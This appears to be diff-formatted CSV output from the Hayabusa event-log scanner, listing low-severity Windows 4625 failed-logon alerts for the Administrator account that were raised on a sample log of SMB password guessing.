+2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Mu7amiHAg0l7bza | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JdG6F697kAXFDx9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jY5AAnfQMH3VZQUa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVep4j7jZZAOAQAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KWWtGIQx8jBgAeoH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zn8X8gen8gX9i3QK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9OdUM99RBHzwgVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJbBVm6wDrqyQmpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAVRBfMxIyrfsEtR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wuCIClZihRxRyjGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxhpEP6nnmihvkHB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1HYmJDrWmKjj8DF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V81dIfR2SRNDk3a2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vaZpLaxB1kcCXqHP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRhs8IoV6R6vyCdL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wUYds3Ym3G2abrV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmBfxm6pPLlSEsUI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VbAuqFggx0zz5iEn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cytpVOjb4KrNaGg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BFFFt7eFzmlzbHhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJQBZZiNKVGXzx4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gyu6EyrtbyowTfC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aASpkRuPfE8Nl64n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MSI2b7LpZpWO3xJW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avNkOq3fsGN3yYJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wnlgy6dW33tRk6UX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: msJ8QrqMluTeUlM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H33NuKduMuskxL0D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BHjp69CD1ttbaK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uxByLPApvfeIhU2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6g0WOAnoGpKyEyzW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P8MTs4Nkbm3ryqcp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Nyd7tr3y0BHmPLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J5KiDQOEnDf6xEPN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3MBP1buuRcBRiQTG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXdcg3MSqnGSvax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kej7zgIDCNR5tnnp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM8SOeQXwytB6iw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XPNATM0IL05vtbZ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H56ci5gbBVzebS2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rRofLg1uxrojU7n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MAhtwTU8OttAhcxf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CwKgAR6OWbkFlxUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lNZR4G0DVsXVg4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZG99tl0RRN3cQoK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nwRzAutxa07Y1xE4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OwhvrVBSRa8RcCKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bLBwBys2favoK7BQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3oYpj1rGcsOWNSs7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IBogtzE6No62tJB9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQJICDi3T4LiwXZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnlKkfHYT0ID3BWr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gw36XaWrYp2M9CZd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aT76CAAER0H98I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TEOZfrP3IYmutAuq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd54DAwwp0BJhhaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AR6Gc128RlPtwcPl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cpjS1YZy2sSRqzI3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKeate89Gw1oEp0U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tBhApsBYa65Hxr0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITv5RS3WHhWe0Hez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WASvcAp9zfU3uSka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H1f6szOactEp5ntF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Loe5RkT9Ki0Aw2Lv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJdVtE7dNSoyM3LI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlAtU1mIO7m5DnuP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wAK2rh94yKwiH2Nw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuqsvmUbPlpWFBRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BShEB6VnXkOxwtFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AjAc5QMvpTBsDziO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fwwp5CD20dR8QrIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tL6GzVzndZL7DZMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zK5IpESvDA2DexwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvTyabCyGaxscOrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
